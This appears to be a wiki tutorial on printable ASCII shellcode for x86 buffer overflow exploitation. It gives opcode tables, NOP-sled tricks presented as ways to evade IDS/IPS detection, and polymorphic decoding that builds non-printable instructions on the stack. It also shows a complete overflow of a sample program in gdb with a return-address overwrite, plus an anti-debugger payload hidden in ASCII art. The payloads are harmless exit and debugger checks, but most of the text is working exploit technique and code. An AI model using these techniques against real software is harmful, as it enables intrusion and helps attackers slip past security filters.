Printable ascii shellcode is used to evade sanitizing on the network and software layers during buffer overflow exploitation.

Introduction

Experimentation says

Ascii shellcode bypasses many character filters and is somewhat easy to learn due to the fact that many ascii instructions are only one or two byte instructions. The smaller the instructions, the more easily obfuscated and randomized they are. During many buffer overflows the buffer is limited to a very small writeable segment of memory, so many times it is important to utilize the smallest possible combination of opcodes. In other cases, more buffer space is available and things like ascii art shellcode are more plausible.

Available Instructions

Protip: The printable ascii shellcode character space consists within 3 main ranges, while symbols exist between them:

Lowercase alpha falls between 0x61 and 0x7a (a-z). Uppercase alpha falls between 0x41 and 0x5a (A-Z). Numeric space falls between 0x30 and 0x39 (0-9).

ASCII Shellcode Table
ASCII Value	Hex Opcode	Assembly Equivalent
0	\x30	xor
1	\x31	xor
2	\x32	xor
3	\x33	xor
4	\x34	xor al, 0x## [byte]
5	\x35	xor eax, 0x######## [DWORD]
6	\x36	SS Segment Override
7	\x37	aaa
8	\x38	cmp
9	\x39	cmp
:	\x3a	cmp
;	\x3b	cmp
<	\x3c	cmp al, 0x## [byte]
=	\x3d	cmp eax, 0x######## [DWORD]
>	\x3e	[undocced nop]
?	\x3f	aas
@	\x40	inc eax
A	\x41	inc ecx
B	\x42	inc edx
C	\x43	inc ebx
D	\x44	inc esp
E	\x45	inc ebp
F	\x46	inc esi
G	\x47	inc edi
H	\x48	dec eax
I	\x49	dec ecx
J	\x4a	dec edx
K	\x4b	dec ebx
L	\x4c	dec esp
M	\x4d	dec ebp
N	\x4e	dec esi
O	\x4f	dec edi
P	\x50	push eax
Q	\x51	push ecx
R	\x52	push edx
S	\x53	push ebx
T	\x54	push esp
U	\x55	push ebp
V	\x56	push esi
W	\x57	push edi
X	\x58	pop eax
Y	\x59	pop ecx
Z	\x5a	pop edx
[	\x5b	pop ebx
\	\x5c	pop esp
]	\x5d	pop ebp
^	\x5e	pop esi
_	\x5f	pop edi
`	\x60	pushad
a	\x61	popad
b	\x62	bound
c	\x63	arpl
d	\x64	FS Segment Override
e	\x65	GS Segment Override
f	\x66	16 Bit Operand Size
g	\x67	16 Bit Address Size
h	\x68	push 0x######## [dword]
i	\x69	imul reg/mem with immediate to reg/mem
j	\x6a	push 0x## [byte]
k	\x6b	imul immediate with reg into reg
l	\x6c	insb es:[edi], [dx]
m	\x6d	insl es:[edi], [dx]
n	\x6e	outsb [dx], dx:[esi]
o	\x6f	outsl [dx], ds:[esi]
p	\x70	jo 0x## [byte relative offset]
q	\x71	jno 0x## [byte relative offset]
r	\x72	jb 0x## [byte relative offset]
s	\x73	jae 0x## [byte relative offset]
t	\x74	je 0x## [byte relative offset]
u	\x75	jne 0x## [byte relative offset]
v	\x76	jbe 0x## [byte relative offset]
w	\x77	ja 0x## [byte relative offset]
x	\x78	js 0x## [byte relative offset]
y	\x79	jns 0x## [byte relative offset]
z	\x7a	jp 0x## [byte relative offset]

Constructing your NOP Sled

Notice: Most modern day IPS systems are capable of recognizing ASCII NOP sleds due to their popularity in modern exploitation. Many IPS systems look for large strings of repeating characters. The solution to this problem is to make use of 'effective NOPs', instead of simply NOPs. Combine this with a randomization sequence and one can avoid IPS detection in a few simple steps.

Instructions

ASCII NOP Pairs (Figure 1)
ASCII Pair	Hex Opcode	Register	Instructions Used	Commonly Detected
AI	\x41\x49	%ecx	INC, DEC	No
@H	\x40\x48	%eax	INC, DEC	Yes
BJ	\x42\x4A	%edx	INC, DEC	No
CK	\x43\x4B	%ebx	INC, DEC	No
DL	\x44\x4C	%esp	INC, DEC	No
EM	\x45\x4D	%ebp	INC, DEC	No
FN	\x46\x4E	%esi	INC, DEC	No
GO	\x47\x4F	%edi	INC, DEC	No

The professor says
You can put the Pair in any order, e.g. AI, IA, @H, H@, as long as both characters are used the same number of times. You can even jumble them together. The above is only true when using INC and DEC NOPs exclusively.

ASCII NOP Pairs (Figure 2)
ASCII Pair	Hex Opcode	Register	Instructions Used	Commonly Detected
PX	\x50\x58	%eax	PUSH, POP	No
QY	\x51\x59	%ecx	PUSH, POP	No
RZ	\x52\x5A	%edx	PUSH, POP	No
S[	\x53\x5B	%ebx	PUSH, POP	Yes
T\	\x54\x5C	%esp	PUSH, POP	Yes
U]	\x55\x5D	%ebp	PUSH, POP	Yes
V^	\x56\x5E	%esi	PUSH, POP	Yes
W_	\x57\x5F	%edi	PUSH, POP	Yes
a`	\x61\x60	ALL	PUSH, POP	Yes

Implementation

Notice: Proper combination of these instructions will work to evade repeating-character based IDS and IPS systems.

There are also other operations can be used as NOPs as well. Of course, these operations do actually do things. This won't affect exploit code because register values are preserved.

For example, '4' or 0x34 is:

<syntaxhighlight lang="asm">xor al, 0x??</syntaxhighlight>

While '5', or 0x35, is:

<syntaxhighlight lang="asm">xor eax, 0x????</syntaxhighlight>

So, if P5LULZX were to execute, nothing would happen other than a waste of cpu cycles. The Assembly looks like :

<syntaxhighlight lang="asm"> [intel] [att sysV] push eax pushl %eax xor eax, 0x4c554c5a xorl $0x4c554c5a, %eax pop eax popl %eax </syntaxhighlight>

The value of the %eax register is momentarily changed and then restored.. That's not really going to modify execution flow, save for cpu cycle count. There's more examples of this too, if the goal is only to create effective NOPs. For example, PhLULZX5LULZX, adds more bytes to the NOP sled:

<syntaxhighlight lang="asm"> [intel] [att sysV] push eax pushl %eax push 0x4c554c5a pushl $0x4c554c5a pop eax popl %eax xor eax, 0x4c554c5a xorl $0x4c554c5a, %eax pop eax popl %eax </syntaxhighlight>

PUSH/POPS can be mixed with INC/DEC operands without much difficulty. Once a register has been pushed to the stack, anything can be done to its value before popping that register back off the stack.

Even arithmetic calculations can be used as long as the original values of the registers are restored. This preserves the environment for the executing shellcode.

In this example using the PUSH and POP instructions, PRQXYZQPRXZY, the code simply re-arranges the register values and puts them back in the right place.

The assembly is as follows:

 [intel]				[att sysV]
 push eax			        pushl %eax
 push edx			        pushl %edx
 push ecx			        pushl %ecx
 pop eax				popl %eax
 pop ecx				popl %ecx
 pop edx				popl %edx
 push ecx			        pushl %ecx
 push eax			        pushl %eax
 push edx			        pushl %edx
 pop eax				popl %eax
 pop edx				popl %edx
 pop ecx				popl %ecx

</syntaxhighlight>

As far as the INC/DEC instructions are concerned, shellcode like ACBKJI leave the %ecx, %edx, and %ebx registers completely unchanged. Therefore any register can be incremented any number of times so long as the register is decremented the same amount.

Protip: INC and DEC use only half a cpu cycle or less depending on CPU architecture and are usually the highest performing instructions of those which are available. Using multiple combinations and implementations of this concept will yield a maximum IDS evasive effect.

Basic Encoding

Notice: Though there aren't many instructions available in the printable character space, there are still enough instructions to manipulate the values of multiple registers and the stack

Single Byte Register Manipulation

Using only ASCII, the smallest method to zero out the %eax register is five bytes, jXX4X, examined below:

Ascii	Machine Code	Assembly
jX	\x6a\x58	push byte 0x58
X	\x58	pop eax
4X	\x34\x58	xor al, 58

Protip: If you look back to the explanation of the eax register, you'll see that the al register is the last byte of eax.

Reviewing that five-byte combination line by line:

Assembly	Action
push 0x58	pushes 58000000 onto the stack
pop eax	pops eax, sets eax to 0x00 00 00 58
xor al, 58	because al = 58, al now = 00, making eax = 0x00000000

Reviewing XOR

XOR (exclusive OR) can sometimes be a serious inconvenience to developers due to the time consuming and tedious nature of xor-encoding by hand. The XOR instruction performs a Bitwise Operation on two values. If the bits are the same, then the corresponding or respective bit is reset to 0. If the two bits are different, then the corresponding or respective bit is set to 1. For example, F xor 3:

 1111 F xor
 0011 3 =
 ------------
 1100 C

Protip: Any time something is XOR'd with itself, it becomes zero.

Example A	Example B
1111 F xor 1111 F = ---------- 0000 0	1001 9 xor 1001 9 = ---------- 0000 0

DWORD Manipulation

Notice: Using printable ASCII as machine code one can PUSH registers, POP registers, PUSH DWORD and byte values, and XOR them.

Some of the more important printable instructions include:

Ascii	Machine Code/hex	Assembly	Operand Size
h	\x68	push 0x########	DWORD
5	\x35	xor eax, 0x########	DWORD
4	\x34	xor al, 0x##	BYTE
X	\x58	pop eax	No Operands
j	\x6a	push 0x##	BYTE
Q	\x51	push ecx	No Operands
P	\x50	push eax	No Operands
Y	\x59	pop ecx	No Operands
Z	\x5a	pop edx	No Operands

So, a small example of ASCII to modify the entire DWORD value of the eax register and set the register value to zero is hLULZX5LULZ:

Ascii	Machine Code	Assembly
hLULZ	\x68\x4c\x55\x4c\x5a	push 0x5a4c554c
X	\x58	pop eax
5LULZ	\x35\x4c\x55\x4c\x5a	xor eax, 0x5a4c554c

And the DWORD eax register has been manipulated and set to 0 in 11 bytes.

Protip: By manipulating the eax register and then pushing it to the stack, you can pop its value into other registers so that the value may be preserved, or so that other registers may be used as necessary.

An introduction to Polymorphic Shellcode

Polymorphic code refers to a piece of code's ability to change itself. Machine code can modify itself through any of the functions which allow modification of registers and the stack. Self-modifying code is generally used to prevent the reverse-engineer from understanding the code. This method of code obfuscation is quite common and is considered a standard in most targeted exploitations.

Due to the nature of the stack and the x86 architecture, the stack grows backwards, but executes forwards.

During the first instruction of a buffer overflow payload's execution, the esp register points to the top of the stack we overflowed. By manipulating this register properly during shellcode execution, code within the context of the currently executing buffer can be modified or overwritten. To apply this concept to polymorphic shellcode, the esp register must be pointing to a location in the stack ahead of the code currently executing. Because the stack grows backwards, pushed bytes will be written in front of the code being executed, and the code executing will eventually hit the bytes of machine code pushed to the stack.

Protip: Without ASCII limitations, we have several instructions, or "modifiers" that we can use for our morphing. Generally, any instruction that can be used to modify the value of a register, in relation to itself (anything other than moving a value into a register) is considered a modifier. Modifiers, including ASCII modifiers, are as follows:

add sub dec inc xor or and not imul idiv shl shr ror rol insb outsb

Notice: This article will only cover printable ascii polymorphic code.

Pushing Nops

The goal is to decode binary ahead of the currently executing printable ascii code. Whenever a register is popped from the stack, the esp has 4 bytes added to its pointer. When the popad or popa instruction is used, %esp has 32 bytes added to its pointer, as 8 registers are popped off the stack at once. Likewise, push and pop of single registers subtract and add 4 to the value of the stack pointer (%esp), respectively.

Suppose one wanted to use the eax register, set it to all NOPs (0x90) and push it onto the stack, using nothing but ASCII. We can't use the \x90 opcode, because the \x90 code does not live in the ASCII keyspace. Obviously this isn't very useful, but the concept is the important part. A very basic polymorphic code is how we will push 0x90909090 onto the stack without referencing the actual value 0x90 a single time. In the shortest amount of bytes possible, the shellcode to do so is jFX4FH5ooooP (12 bytes), let's analyze that:

Ascii	Machine Code	Assembly
jF	\x6a\x46	pushb $0x46
X	\x58	pop %eax
4F	\x34\x46	xor $0x46, %al
H	\x48	decl %eax
5oooo	\x35\x6f\x6f\x6f\x6f	xorl $0x6f6f6f6f, %eax
P	\x50	pushl %eax

If this is still confusing, this is further breakdown, following the %eax register, in both common assembly syntaxes:

ATT SystemV Assembly	Intel Assembly	Value of eax register
pushb $0x46	push 0x46
pop %eax	pop eax	0x00000046
xorb $0x46, %al	xor al, 0x46	0x00000000
decl %eax	dec eax	0xffffffff
xorl $0x6f6f6f6f, %eax	xor eax, 0x6f6f6f6f	0x90909090
pushl %eax	push eax

There are two things happening here which haven't been covered thoroughly. The first one of these is the dec eax, or the \x48 instruction. Usually, dec simply decrements the affected register. However, when that register is already equal to 0x00000000, dec will underflow and set the register to 0xffffffff. The second thing is the XOR instruction. The XOR instruction in the above code does an exclusive or as follows:

 0xffffffff xor
 0x6f6f6f6f

And stores the value in eax, then PUSHes eax. This is a nybble by nybble, byte by byte following of the exclusive or instruction:

 1111	1111	1111	1111	1111	1111	1111	1111	(FFFFFFFF) xor
 0110	1111	0110	1111	0110	1111	0110	1111	(6F6F6F6F) =
 ----	----	----	----	----	----	----	----	--------------
 1001	0000	1001	0000	1001	0000	1001	0000	(90909090)

Polymorphic code should consist of methods which place a random or comment value into a register, and then XOR the register until the desired value has been reached. We can start the register value at any ASCII value, 0x00000000, or 0xffffffff, by XORing a register with itself, or by setting the register value to zero and then decrementing it.

Notice that this shellcode is 100% alphanumeric. There is of course, non-ASCII and non-alphanumeric polymorphic code, which has much less inhibitions than printable ASCII or alpha-numeric bytecode.

A sequence for exit

In linux/x86 the exit interrupt is pretty straight forward:

.section .data .section .text .globl _start _start: xorl %eax, %eax incl %eax xorl %ebx, %ebx int $0x80

The professor says

If you'd like to test this, put the contents of the above code box into a textfile named exit.s. Then run the following commands in your bash prompt:

as exit.s --32 -o exit.o ; ld exit.o -o exit ; ./exit

You will see that exit executes without crashing due to segmentation fault or anything of that nature. The above code sets the interrupt call (the %eax register) to 1 (the exit function's kernel interrupt), and the exit code (%ebx register) to 0, which you can see by doing the following:

./exit ; echo $?

We're going to use the exit code "3" for our example of polymorphism, so we'll be able to see if our shellcode properly executed. We'll use the following code:

.section .data .section .text .globl _start _start: xorl %eax, %eax incl %eax movl $3, %ebx int $0x80

Go ahead and re-assemble and execute this, testing for the exit code:

[user@host ~]$ echo $? 3

From assembling to machine code

To get shellcode for the exit sequence, one can use the objdump command line bash utility:

[user@host ~]$ objdump -d exit exit: file format elf64-x86-64 Disassembly of section .text: 0000000000400078 <_start>: 400078: 31 c0 xor %eax,%eax 40007a: ff c0 inc %eax 40007c: bb 03 00 00 00 mov $0x3,%ebx 400081: cd 80 int $0x80

Objdump did a decent favor here - breaking the output into table format:

Memory Address	Machine Code	Assembly
400078	31 c0	xor %eax,%eax
40007a	ff c0	inc %eax
40007c	bb 03 00 00 00	mov $0x3,%ebx
400081	cd 80	int $0x80

It can be easily determined that the machine code for this is "\x31\xc0\xff\xc0\xbb\x03\x00\x00\x00\xcd\x80"

Examining the assembly and shellcode further, because we can easily manipulate eax and ebx, the real challenge here is getting "\xcd\x80" onto the stack. Its also got to go on first, since it is executed last. Closer examination will also reveal one need not push the other instructions, so long as the values of %ebx and %eax are sound when the kernel interrupt is called. So, because "\xcd\x80" is two bytes, or a word, we will have to use the 0x66 (or f in alpha) instruction prefix to force a 16-bit operand size in conjunction with the 0x35 xor dword instruction. Though, we still have to find something that when XOR'd with 0xcd80 appears in the printable character space (between 0x30 and 0x7a).

Converting Exit to Printable Ascii

We need to keep the following in mind when converting our exit shellcode to ascii:

For successful exploitation, we'll have to use a trick from our ascii nop example to get eax to 0xffffffff. Our target is ????80cd, because it must go onto the stack backwards The first two bytes will be completely irrelevent, as they will occur in our stack after the kernel interrupt for exit. The %eax register must equal the value '1' when the interrupt is called. The %ebx register must equal the decimal value '3' or hexidecimal value 0x03 when the interrupt is called.

eax & ebx

Lets take a look at %ebx. We'll need to set its value to 0x03. The best way we can do that is by manipulating the %eax register, then pushing the eax register and popping the value back into %ebx. We can do that with the following code:

pushb $0x30 pop %eax xorb $0x33, %al pushl %eax pop %ebx

Now %ebx and %eax are both 3. The %eax register can simply be decremented twice (H in alpha) to get to the value of '1':

When analyzed:

Assembly	Machine Code	Ascii
pushb $0x30	\x6a\x30	j0
pop %eax	\x58	X
xor $0x33, %al	\x34\x33	43
pushl %eax	\x50	P
pop %ebx	\x5b	[
decl %eax	\x48	H
decl %eax	\x48	H

The ascii code for this manipulation of the %eax and %ebx registers looks like "j0X43P[HH".

The Kernel Interrupt

This next part is a bit more difficult. We need to construct \xcd\x80 on the stack. So, first, lets zero out the eax register, and decrement it to get 0xffffffff:

Assembly	Ascii
pushb $0x6a	jj
pop %eax	X
xorb $0x6a, %al	4j
decl %eax	H

Once we've run jjX4jH, we've got eax set to 0xffffffff. Now, lets determine what our target xor should be:

 FFFF xor
 80CD = 
----------
 7F32

Now due to the way xor works, we can just assume we're trying to find two ascii sequences that when xor'd together come out to 0x7f32:

Assembly	Machine Code	Ascii
xor $0x4f65, %ax	\x66\x35\x4f\x65	f5Oe
xor $0x3057, %ax	\x66\x35\x30\x57	f50W
pushl %eax	\x50	P

And all put together, our ascii code for getting \xcd\x80 onto the stack in the correct order looks like "jjX4jHf5Oef50WP".

The Code

Now we need to tie all of these things together along with our knowledge of the stack to ensure proper execution of the code. The first thing we have to do is add to ESP. Lets find out how many bytes we must add by adding up all this shellcode. So far, we've got "jjX4jHf5Oef50WP" and "j0X43P[HH" to push \xcd\x80 onto the stack, and using stack space, we are able to set %eax to 1 and %ebx to 3. The next problem in the equation is that we rely on push to apply values, and we've just pushed instructions (\xcd\x80) onto the stack with the first bit, which could get overwritten or have instructions written in front of it.

There are multiple solutions to this:

Overwriting a dword (or more memory) between the currently executing code and yet-to-be-executed code with nops after its been used for the stack.
Add 8 to esp every time a piece of code is decoded and pushed to the stack, so that unpacking code will unpack forwards rather than backwards.

In this example, we're adding 8 to %esp by popping an arbitrary register that our code doesn't care about. In this case, the arbitrary register is %edx. So once the exit code has been written, %edx is popped twice to add 8 to %esp. This will not only prevent us from overwriting our exit code with a single push instruction, but also prevents single-push instructions from overwriting code between executing code and the freshly unpacked the exit code.

In review:

The stack pointer (%esp) must be set to the value of our shellcode's length in bytes above the instruction pointer (%eip)
We'll have to manipulate the stack properly to avoid overwriting reconstructed instructions.

To align our stack pointer, we'll use a combination of the popad instruction and pop register instructions - this will ensure the smallest possible code. Assuming that %eip = %esp at the time of our code's execution (it rarely will; we'll get to that) the smallest possible code is 28 bytes:

 aPjjX4jHf5eOf5W0PZZj0X43P[HH

So, lets see what's going on here:

Assembly	Machine Code	Ascii	Comment
popa	\x61	a	Used to align %esp 32 bytes ahead - 4 bytes from the end of our shellcode
pushl %eax	\x50	P	Used to subtract 4 from %esp to align it immediately after our code
pushb $0x6a	\x6a\x6a	jj	put $0x6a on the stack
pop %eax	\x58	X	%eax is set to 0x6a
xorb 0x6a, %al	\x34\x6a	4j	Zero out %eax
decl %eax	\x48	H	%eax is now set to 0xffffffff so we can get to \xcd\x80 with xor
xor $0x4f65, %ax	\x66\x35\x65\x4F	f5eO	Our first round of xor
xor $0x3057, %ax	\x66\x35\x57\x30	f5W0	Sets %eax to 0xffff80cd
push %eax	\x50	P	Makes \xcd\x80\xff\xff hit the stack
pop %edx	\x5a	Z	Used to add 4 to %esp, because %edx does not matter for our code.
pop %edx	\x5a	Z	Add 4 more to %esp, now we're past the code for exit constructed in front of our code
pushb $0x30	\x6a\x30	j0	Set up to set ebx = 3
pop %eax	\x58	X	%eax = $0x30
xor $0x33, %al	\x34\x33	43	set %eax to 3 for moving it into %ebx
push %eax	\x50	P	push 0x00000003 onto the stack, ahead of our interrupt sequence
pop %ebx	\x5b	[	Set the exit code to '3' by the value off of the stack into %ebx
decl %eax	\x48	H	Since we stored 3 in %eax as well as %ebx, we can decrement %eax twice to get 1.
decl %eax	\x48	H	%eax is 1, %ebx is 3. The next bytes have been overwritten with machine code for int $0x80.

Now we just need to get this to ascii that we can put onto the stack. The preferred method to do this is by using "strings" against the generated object file. Save the above code in a file called payload.s, assemble it with 'as' and run strings on payload.o, as follows:

 [user@host ~]$ as payload.s --32 -o payload.o
 [user@host ~]$ strings payload.o 
 aPjjX4jHf5eOf5W0PZZj0X43P[HH

And to make sure its 28 bytes:

 [user@host ~]$ echo -n $(strings payload.o)|wc
   1       1      28

Testing Our Code

Notice: Stack dumps in this segment have been shortened for brevity and readability.

Analyzing our Buffer

Using our bof.c example from buffer overflows, we're given a 100 byte buffer.

Lets start with 116 "A" characters to isolate the return pointer:

[hatter@eclipse ~]$ gdb -q ./bof
Reading symbols from /home/hatter/bof...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x80483e7
(gdb) r `perl -e 'print "A"x116'`
Starting program: /home/hatter/bof `perl -e 'print "A"x116'`
(gdb) x/200x $esp
0xbffff538:     0x00000000      0xb7e35483      0x00000002      0xbffff5d4

Notice that %esp is aligned at 0xbffff538. Skipping to the end, our code starts appearing at 0xbffff748.

0xbffff738:     0x41410066      0x41414141      0x41414141      0x41414141
0xbffff748:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff758:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff768:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff778:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff788:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff798:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7a8:     0x41414141      0x58004141      0x445f4744      0x5f415441

A little bit of hex math will tell us that 0x748 - 0x538 = 0x1f0 (or 496 in decimal). Dividing this by 32 gives us the decimal value '15'. If we go directly to 0xbffff748, we will also have skipped 18 bytes of our code. To round it off, lets make sure we have 32 "A" characters at the beginning. So, if we want our code to execute properly, we can deduce that we will need at least 16 'popa' instructions to get %esp to point to our own code. So, lets do just a little more math here. Lets start with our 32 'A' characters, then 16 'a' characters. Wait, that adds 16 to the required value of %esp, so, we'll add two more 'a' (for a total of 18) characters and a trailing 34 bytes of nop's before our return pointer.

A Successful Overflow

[hatter@eclipse ~]$ gdb -q ./bof
Reading symbols from /home/hatter/bof...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x80483e7
(gdb) r `perl -e 'print "A"x32 . "a"x18 . "aPjjX4jHf5eOf5W0PZZj0X43P[HH" . "A"x34 . "\x48\xf7\xff\xbf"'`
Starting program: /home/hatter/bof `perl -e 'print "A"x32 . "a"x18 . "aPjjX4jHf5eOf5W0PZZj0X43P[HH" . "A"x34 . "\x48\xf7\xff\xbf"'`
Breakpoint 1, 0x080483e7 in main ()
(gdb) continue
Continuing.
[Inferior 1 (process 29422) exited with code 03]

Analysis says

So here's what happened. When the code hit 0xbffff748, we added (18 * 32 = 576 = 0x240) to the %esp register. Some quick math explains that 0xbffff538 + 0x240 = 778. An examination of where the code wound up will indicate that %esp has been successfully set to a value after the shellcode.

[hatter@eclipse ~]$ gdb -q ./bof
Reading symbols from /home/hatter/bof...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x80483e7
(gdb) r `perl -e 'print "A"x32 . "a"x18 . "aPjjX4jHf5eOf5W0PZZj0X43P[HH" . "A"x34 . "\x48\xf7\xff\xbf"'`
Starting program: /home/hatter/bof `perl -e 'print "A"x32 . "a"x18 . "aPjjX4jHf5eOf5W0PZZj0X43P[HH" . "A"x34 . "\x48\xf7\xff\xbf"'`
Breakpoint 1, 0x080483e7 in main ()
(gdb) x/200x $esp
0xbffff538:     0x00000000      0xb7e35483      0x00000002      0xbffff5d4
[Shortened for brevity]
0xbffff738:     0x41410066      0x41414141      0x41414141      0x41414141
0xbffff748:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff758:     0x61614141      0x61616161      0x61616161      0x61616161
0xbffff768:     0x61616161      0x6a6a5061      0x486a3458      0x4f653566
0xbffff778:     0x30573566      0x6a5a5a50      0x33345830      0x48485b50
0xbffff788:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff798:     0x41414141      0x41414141      0x41414141      0x41414141

Notice: So the offset 0x778 is still inside the shellcode. That's ok though, the original 'a' or popa at the very beginning of the shellcode sets %esp to 0xbffff788. Expirement with this by setting breakpoints at 0xbffff788 (or the return pointer + 28), and seeing what gets written. A value of 0xffff80cd will be written right there - and if you step through instruction by instruction, the dword after it will constantly change as its being used for temporary stack space.

Protip: You can easily modify the exit code by modifying the ascii without having to go through the entire assembly and disassembly process over.

Changing the '3' to '4', and adding an additional decl %eax with 'H':

(gdb) r `perl -e 'print "A"x32 . "a"x18 . "ajjX4jHf5eOf5W0PZZj0X43P[HH" . "A"x35 . "\x48\xf7\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/hatter/bof `perl -e 'print "A"x32 . "a"x18 . "ajjX4jHf5eOf5W0PZZj0X43P[HH" . "A"x35 . "\x48\xf7\xff\xbf"'`
[Inferior 1 (process 17860) exited with code 03]
(gdb) r `perl -e 'print "A"x32 . "a"x18 . "ajjX4jHf5eOf5W0PZZj0X44P[HHH" . "A"x34 . "\x48\xf7\xff\xbf"'`
Starting program: /home/hatter/bof `perl -e 'print "A"x32 . "a"x18 . "ajjX4jHf5eOf5W0PZZj0X44P[HHH" . "A"x34 . "\x48\xf7\xff\xbf"'`
[Inferior 1 (process 18701) exited with code 04]

Encoding Shellcode : Ascii Art

This is a simple win32 alphanumeric encoded shellcode expanded using jump. It is also possible to expand polymorphic code in this way, or to write a packer/unpacker that interacts with ascii art.

Lets start out with Koshi's 14 byte alphanumeric NtGlobalFlags payload:

 jpXV34dd3v09Fh

Notice: This payload ends on a CMP, so we'll have to add our own jump condition. If the values are equal, the debugger is present; if the values are not, there is no debugger present. So, we can use the je byte offset instruction (t in alpha) to maintain printable code. We'll want to exit if there's a debugger present, else we can continue code execution.

 
  push 'p'                          ;jp
  pop eax                           ;X
  push esi                          ;V
  xor esi, dword ptr ss:[esp]       ;34d  (now contains esi), esi = 0
  xor esi, dword ptr ss:[esi+30]    ;d3v0 (store offset 0x30 into esi)
  cmp dword ptr ds:[esi+68], eax    ;9Fh  (compare esi pointer offset 0x68 with 0x70.)

So for our beginning notes, we can be assured that the following must be sequential, and registers must be preserved:

V34dd4v0 - ESI must be zeroed, NtGlobalflags must be stored in ESI.
esi cannot be modified until eax is set to 0x6a/'j' and then 9Fh is run as a comparison.

Available comparison operators are a little hacky. We can compare the eax register to a dword using the '=' opcode 0x3a, other than that we're limited to the unpredictable x38-0x3b instructions. For brevity we will use the '=' opcode here. Other available printable comparison operators will be reserved for future instructions, as they get much more complex.

Suppose we wanted to jump 30 bytes ahead in pure ascii. The easy way to do this is by setting the value of the eax register to a controllable ascii DWORD. In our case, we'll use the string 'code':

 hcodeX=codet0

Disassembled, this represents:

push 'code' pop %eax cmp 'code', %eax je 0x30

Lets get ourselves some ascii art. This ascii art is 80 bytes wide, so each line is 81 bytes including the newline (0x0a).

                      oooooooooo.              .o8                             
                      `888'   `Y8b            "888                             
ooo. .oo.    .ooooo.   888      888  .ooooo.   888oooo.  oooo  oooo   .oooooooo
`888P"Y88b  d88' `88b  888      888 d88' `88b  d88' `88b `888  `888  888' `88b 
 888   888  888   888  888      888 888ooo888  888   888  888   888  888   888 
 888   888  888   888  888     d88' 888    .o  888   888  888   888  `88bod8P' 
o888o o888o `Y8bod8P' o888bood8P'   `Y8bod8P'  `Y8bod8P'  `V88V"V8P' `8oooooo. 
                                                                     d"     YD 
                                                                     "Y88888P'

Lets see which lines look the best for code insertion. The string 'hcodeX=codet0' is 13 bytes. We can start with a jump to the big string of o's at the top of the 'D' in Debug. The first 'o' is at row two, column 23. 81 + 23 = 104, or 0x68, the 'h' character:

hcodeX=codeth                                                                  
                      oooooooooo.              .o8                             
                      `888'   `Y8b            "888                             
ooo. .oo.    .ooooo.   888      888  .ooooo.   888oooo.  oooo  oooo   .oooooooo
`888P"Y88b  d88' `88b  888      888 d88' `88b  d88' `88b `888  `888  888' `88b
 888   888  888   888  888      888 888ooo888  888   888  888   888  888   888
 888   888  888   888  888     d88' 888    .o  888   888  888   888  `88bod8P'
o888o o888o `Y8bod8P' o888bood8P'   `Y8bod8P'  `Y8bod8P'  `V88V"V8P' `8oooooo.
                                                                     d"     YD
                                                                     "Y88888P'

We have now jumped to the top of the D. So, going back to our shellcode, as long as we preserve eax, we can jump in the string '=codeth' which is 7 bytes, which lets us squeeze shellcode in spaces. Using our dword 'code' will actually let us tag our shellcode, serving as a tag on the next line in empty space. Because we can only jump 122 bytes, we can't get to a part of the ascii art with enough room. We can solve this problem by finding empty enough space to toss our jump code in, along with a little bit of the necessary shellcode:

hcodeX=codeth                                                                  
                      V34d=codet4              .o8                             
   d4v0=codet?        `888'   `Y8b            "888                             
ooo. .oo.    .ooooo.   888      888  .ooooo.   888oooo.  oooo  oooo   .oooooooo
`888P"Y88b  d88' `88b  888      888 d88' `88b  d88' `88b `888  `888  888' `88b
 888   888  888   888  888      888 888ooo888  888   888  888   888  888   888
 888   888  888   888  888     d88' 888    .o  888   888  888   888  `88bod8P'
o888o o888o `Y8bod8P' o888bood8P'   `Y8bod8P'  `Y8bod8P'  `V88V"V8P' `8oooooo.
                                                                     d"     YD
                                                                     "Y88888P'

We've actually gotten up to the ? mark, and all the way through the bit of code to store the PEB value into the %esi register using the string 'V34dd4v0' while maintaining our ability to jump around. Our next bit of code is going to be tricy. We'll have to jump 80 bytes to land at the top of our 'e'. From there we'll go to the lower top of the 'n', then to the middle of the 'e'. From there to the middle of the g to the bottom of the b, create an extra bottom on the D to accentuate, then jump to the bottom of the 'g' when we're finished. The end result, after calculating out the ascii looks like:

hcodeX=codeth                                                                  
                      V34d=codet4              .o8                             
   d4v0=codeti        `888'   `Y8b            "888                             
ooo. .oo.    .ooooo.   888      888  =codet.   888oooo.  oooo  oooo   .oooooooo
`888codetn  d88' `88b  888      888 d88' `88b  d88' `88b `888  `888  888' `88b 
 888   888  888   888  888      888 88=codetk  888   888  888   888  888   888 
 888   888  888   888  888     d88' 888    .o  888   888  888   888  `=codet5' 
o888o o888o `Y8bod8P' o888bood8P'   `Y8bod8P'  `=codet0'  `V88V"V8P' `8oooooo. 
                     =codet|                                         d"     YD 
                                                                     "jpX9Fht?

Ascii shellcode

Contents